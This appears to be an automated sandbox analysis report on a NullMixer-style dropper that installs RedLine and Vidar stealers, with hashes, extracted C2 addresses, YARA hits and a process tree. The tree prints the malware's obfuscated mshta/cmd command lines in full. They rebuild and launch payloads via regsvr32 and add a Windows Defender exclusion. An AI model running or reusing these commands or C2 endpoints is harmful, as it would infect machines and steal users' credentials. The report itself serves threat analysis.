Analysis
-
max time kernel
0s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
07-01-2024 19:23
Static task
static1
Behavioral task
behavioral1
Sample
8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe
Resource
win7-20231129-en
General
-
Target
8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe
-
Size
5.1MB
-
MD5
ea2b3d6abba472d4f37f31edcf64371c
-
SHA1
d497f364487fd039f8167ba316e98c819d469088
-
SHA256
8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0
-
SHA512
628579fb71692ad284c79017e77a961449e26654dce4f6950225735c61f56cb66ced274e86e9116c84374882ffac2419b9d8f9c8e8cd48274c05e8bf34030ccf
-
SSDEEP
98304:yuEE/LXN/acREegl8Xn+zrnP0xhJuDwhRzV0utBvn3F/92PHPSOSftvW:yuLN/ac0LsJucB0On3F/9gvS0
Malware Config
Extracted
redline
pab777
185.215.113.15:6043
Extracted
vidar
40.3
706
https://lenko349.tumblr.com/
-
profile_id
706
Extracted
nullmixer
http://hsiens.xyz/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/2264-188-0x0000000002280000-0x00000000022A6000-memory.dmp family_redline behavioral1/memory/2264-198-0x0000000002360000-0x0000000002384000-memory.dmp family_redline -
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/2264-188-0x0000000002280000-0x00000000022A6000-memory.dmp family_sectoprat behavioral1/memory/2264-198-0x0000000002360000-0x0000000002384000-memory.dmp family_sectoprat -
Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/1840-183-0x0000000002BC0000-0x0000000002C93000-memory.dmp family_vidar behavioral1/memory/1840-190-0x0000000000400000-0x0000000002BB1000-memory.dmp family_vidar behavioral1/memory/1840-370-0x0000000000400000-0x0000000002BB1000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00090000000141d3-37.dat aspack_v212_v242 behavioral1/files/0x00090000000141d3-36.dat aspack_v212_v242 -
Executes dropped EXE 1 IoCs
pid Process 2840 setup.exe -
Loads dropped DLL 4 IoCs
pid Process 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 2840 setup.exe 2840 setup.exe 2840 setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 848 3000 WerFault.exe 2684 1840 WerFault.exe 30 2844 1000 WerFault.exe -
Kills process with taskkill 1 IoCs
pid Process 2096 taskkill.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28 PID 2972 wrote to memory of 2840 2972 8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe"C:\Users\Admin\AppData\Local\Temp\8896b158ac271c269cfea637cd9402db48676eeef02b9d694d5c9f0eaeb3dbb0exe.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\7zS81B68726\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS81B68726\setup_install.exe"3⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0868f8edbe.exeThu0868f8edbe.exe1⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu088fadf0b8243.exeThu088fadf0b8243.exe1⤵PID:1840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 9602⤵
- Program crash
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu080dd9a579466867.exeThu080dd9a579466867.exe1⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu08d076312cbc3.exe"C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu08d076312cbc3.exe" -u1⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0813cdfb0d27.exeThu0813cdfb0d27.exe1⤵PID:540
-
C:\Users\Admin\AppData\Local\Temp\is-CFI8M.tmp\Thu0898a9af0cbc91e74.tmp"C:\Users\Admin\AppData\Local\Temp\is-CFI8M.tmp\Thu0898a9af0cbc91e74.tmp" /SL5="$201F4,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0898a9af0cbc91e74.exe"1⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0836dbd347b.exeThu0836dbd347b.exe1⤵PID:1804
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIpT: cLOse ( cReaTeobjEcT("wScripT.SheLl"). run ("CMD /c TYpe ""C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0836dbd347b.exe"" > ..\ADzBUW4JwQHA4F.EXE && STart ..\ADZbUW4JwQHA4F.eXe -p6ApM4~jDVYg0_ &if """"== """" for %U in ( ""C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0836dbd347b.exe"" ) do taskkill -Im ""%~nXU"" /F " ,0 , TruE ) )2⤵PID:280
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TYpe "C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0836dbd347b.exe" > ..\ADzBUW4JwQHA4F.EXE && STart ..\ADZbUW4JwQHA4F.eXe -p6ApM4~jDVYg0_ &if ""=="" for %U in ( "C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0836dbd347b.exe" ) do taskkill -Im "%~nXU" /F3⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\ADzBUW4JwQHA4F.EXE..\ADZbUW4JwQHA4F.eXe -p6ApM4~jDVYg0_4⤵PID:2688
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIpT: cLOse ( cReaTeobjEcT("wScripT.SheLl"). run ("CMD /c TYpe ""C:\Users\Admin\AppData\Local\Temp\ADzBUW4JwQHA4F.EXE"" > ..\ADzBUW4JwQHA4F.EXE && STart ..\ADZbUW4JwQHA4F.eXe -p6ApM4~jDVYg0_ &if ""-p6ApM4~jDVYg0_ ""== """" for %U in ( ""C:\Users\Admin\AppData\Local\Temp\ADzBUW4JwQHA4F.EXE"" ) do taskkill -Im ""%~nXU"" /F " ,0 , TruE ) )5⤵PID:2104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TYpe "C:\Users\Admin\AppData\Local\Temp\ADzBUW4JwQHA4F.EXE" > ..\ADzBUW4JwQHA4F.EXE && STart ..\ADZbUW4JwQHA4F.eXe -p6ApM4~jDVYg0_ &if "-p6ApM4~jDVYg0_ "=="" for %U in ( "C:\Users\Admin\AppData\Local\Temp\ADzBUW4JwQHA4F.EXE" ) do taskkill -Im "%~nXU" /F6⤵PID:1820
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:clOsE (cReateoBjECT ("WscRiPt.shelL"). run ( "CMD /c eCHo TAB~%rANdOM%C> F4XX.sle & eCHO | sET /p = ""MZ"" > YJkiHcUJ.ADI& COpy /Y /B YJkiHCuJ.ADI+Z27E.0+DEW2sU.7QH+ 1yV2uMsa.c + XRH8oIt.JTz + F4XX.sLe ..\UTLRVkcQ.0G6 & StART regsvr32.exe ..\UTLRVkcQ.0G6 /u -S &Del /Q * " , 0 ,truE ) )5⤵PID:1644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo TAB~%rANdOM%C> F4XX.sle& eCHO | sET /p = "MZ" > YJkiHcUJ.ADI&COpy /Y /B YJkiHCuJ.ADI+Z27E.0+DEW2sU.7QH+1yV2uMsa.c +XRH8oIt.JTz +F4XX.sLe ..\UTLRVkcQ.0G6 & StART regsvr32.exe ..\UTLRVkcQ.0G6 /u -S &Del /Q *6⤵PID:3068
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Thu0836dbd347b.exe" /F4⤵
- Kills process with taskkill
PID:2096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu0898a9af0cbc91e74.exeThu0898a9af0cbc91e74.exe1⤵PID:2360
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>YJkiHcUJ.ADI"1⤵PID:1920
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe ..\UTLRVkcQ.0G6 /u -S1⤵PID:2452
-
C:\Users\Admin\AppData\Local\Temp\f776a19.exe"C:\Users\Admin\AppData\Local\Temp\f776a19.exe"2⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "1⤵PID:2960
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu08d076312cbc3.exeThu08d076312cbc3.exe1⤵PID:2304
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu086b35d9fce5c35dd.exeThu086b35d9fce5c35dd.exe1⤵PID:2236
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\Thu08e8f22dec23b.exeThu08e8f22dec23b.exe1⤵PID:2284
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵PID:1768
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu080dd9a579466867.exe1⤵PID:1108
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu086b35d9fce5c35dd.exe1⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 4321⤵
- Program crash
PID:848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0898a9af0cbc91e74.exe1⤵PID:1660
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu08e8f22dec23b.exe1⤵PID:1116
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu088fadf0b8243.exe1⤵PID:1732
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0813cdfb0d27.exe1⤵PID:1072
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0836dbd347b.exe1⤵PID:2944
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu08d076312cbc3.exe1⤵PID:2820
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0868f8edbe.exe1⤵PID:2908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS09ABED26\setup_install.exe"1⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\cb614b141f.exeC:\Users\Admin\AppData\Local\Temp\cb614b141f.exe1⤵PID:2704
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\cb614b141f.exe1⤵PID:2636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1000 -s 6521⤵
- Program crash
PID:2844
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD581d6f0a42171755753e3bc9b48f43c30
SHA1b766d96e38e151a6a51d72e753fb92687e8f9d03
SHA256e186cf97d768a139819278c4ce35e6df65adb2bdaee450409994d4c7c8d7c723
SHA512461bf23b1ec98d97281fd55308d1384a3f471d0a4b2e68c2a81a98346db9edc3ca2b8dbeb68ae543796f73cc04900ec298554b7ff837db0241863a157b43cda1
-
Filesize
1.4MB
MD5b6f058800668bf917f5dcb38961914cf
SHA15652f06c0f86972f20f1fb4156c421f527ba415d
SHA256a6f224b54dfd2ddcd29c4e8b5ffa7693b219788eb3030ff66a40b0649203b161
SHA512b0f39b97ac4542123c738eff4495a3efecffa0d430f3c6211b5ad07ba51f388a6fa4df9753a89aaa0ae87fc071074ccc20821b83344dcf3347ad7cb2b2d86aa5
-
Filesize
442KB
MD5c9feea19fd9fd1df80bd01d5f34a69aa
SHA11addee260d13e48f56555d18708c80d9054ca6ce
SHA256f62a6d4b85d5742f8fa2c08d332be8005fdd806284662d8beeddfc001f3dd167
SHA512f60276546d00f2744dd923a93e39b8bffc40a211c67d69d9a61f6b50a759fd1465a5f234a0337d6a2f5c8d128708a17134cc5a366670436fd8f402fdaf4df340
-
Filesize
321KB
MD50953d397ea86e75a2409f6cf10d06817
SHA1b5308f7b2635fb59b3be60a1040d586c34fbbba7
SHA2567fa4862274dbb18b99434f3cbc6c2252d76fb6453f5e4ff865e22ffa58f1bb12
SHA512de543385258f6644e9337b8e8592a4644eb39f0d1f12081fc4e19b430b09ced24a352a9ab4b9044518d87fe4d8875d8cd6b47b848d847d2d3dc81fcaba6ea46e
-
Filesize
147KB
MD5714370a0de0c418b38c2d37564a236c0
SHA144de4bee36c0c3afa64ebabaccdc7345071f1ef1
SHA25658b7a78fdce45756b3126514a10d7f58190403f5a76f48748c747bd4f7abbdd6
SHA512759f27690755901a2f23d30eec30f39ac124c976687bf1025dfe359ccf7eb4fb3d1f294af6319b2b794022c08dcfab26295cc12c60f9f065c393ed89dbba773e
-
Filesize
69KB
MD51e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA5123653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
-
Filesize
27KB
MD56777f6d6b22b17fd611f515f583b8b41
SHA15312fcbacd03c9d3607c524c449cf88ea39987b5
SHA25683cee49a881a539dfb2f56487bf65455c33bdff8943000f8900164647f17fcbe
SHA512e7ffafb327264bca331bc0b61fb88fe5bb0bf830375aa1a32b5aa485d0cd6ee73b5bbde5dc1daae967bb75ddfe1d07e018f5490363f70522226c772de00a596d
-
Filesize
1.9MB
MD5c101d75461d528873bd10ba888040b03
SHA1621629cb5b8d8301c86f4a5b5ff89ce47fdbde07
SHA256d4020d84692c64d535feb3ce7649055162a6168b04ea2ada1b64f98a1e1a169a
SHA5124e71a0ce4042d6fcd8b8828f0b45a1e13275ca7bff99ceed0213997ed4521f8735a25d6db941a7926d72fea3ce35b7b8abc752a9f187b0c8f39c591f95156ade
-
Filesize
993KB
MD5098e5380d8f43c5e2b72ae60aba9d847
SHA1a5052dac28d05b27f06a3d3f72d43e4d71021ac4
SHA2566f4d348f5571df8004392700006df7e773812e834c1e4e13e1072d72aede6342
SHA512093f73b9c3bebf329244b2e9f5861c5bf350a47cc466846f40b632da3f50cbb21c2f2f158224359071f4c094e9f1c318182d6b6c9d0fe0fc6fb8567bd1076c23
-
Filesize
1.9MB
MD526712c052087ea1f45249b26ca9a60fd
SHA1434d0dc99f4d8a7595c9644f9964e62a73cb66c5
SHA2564a175847a66ea6605c7cf1945914d73b2c63d9c20161bb1ea19b70b2ac8c7329
SHA51264d5f9c3239b90ada28c8ed37d9223d8b637360c80c832d9f366ecc924d1bd313eaba0bb5cecf6c0921c7554767887794e86fd084cabbdf781beae14fb8cdf1d
-
Filesize
1024KB
MD52f016896feb4e222e4d41cd5bc7183f3
SHA107902198bf518fb1a714b66822d7ade70867e93c
SHA25653d669c9e156a263d0bdde2af534706773bae659951c9a790868eceb20192d10
SHA512d22926b5a89c66b64a749e15b75b800843e520a87f55692b4a3fc9d6865bdaccd5db6fc08f9562634df961fc6b594506de3495a92083c021b9befea76d4c11b0
-
Filesize
92KB
MD5d772d6902200f5d4599a9b27d0d8f9e6
SHA1564eefb3fabe655b2fb51f492959b158cb20e12d
SHA2567bf11639663306b53a7fe0e3826d12f03e1dda7b1fb3abaa758e3281d35f8e17
SHA5126682d79a013129aceba9cde75a82f0444a28d30bfbd1c4656d7e3774b469283027a780362657c908c991f9b5939db32792e6713a323667ab763a95b3f3e23d36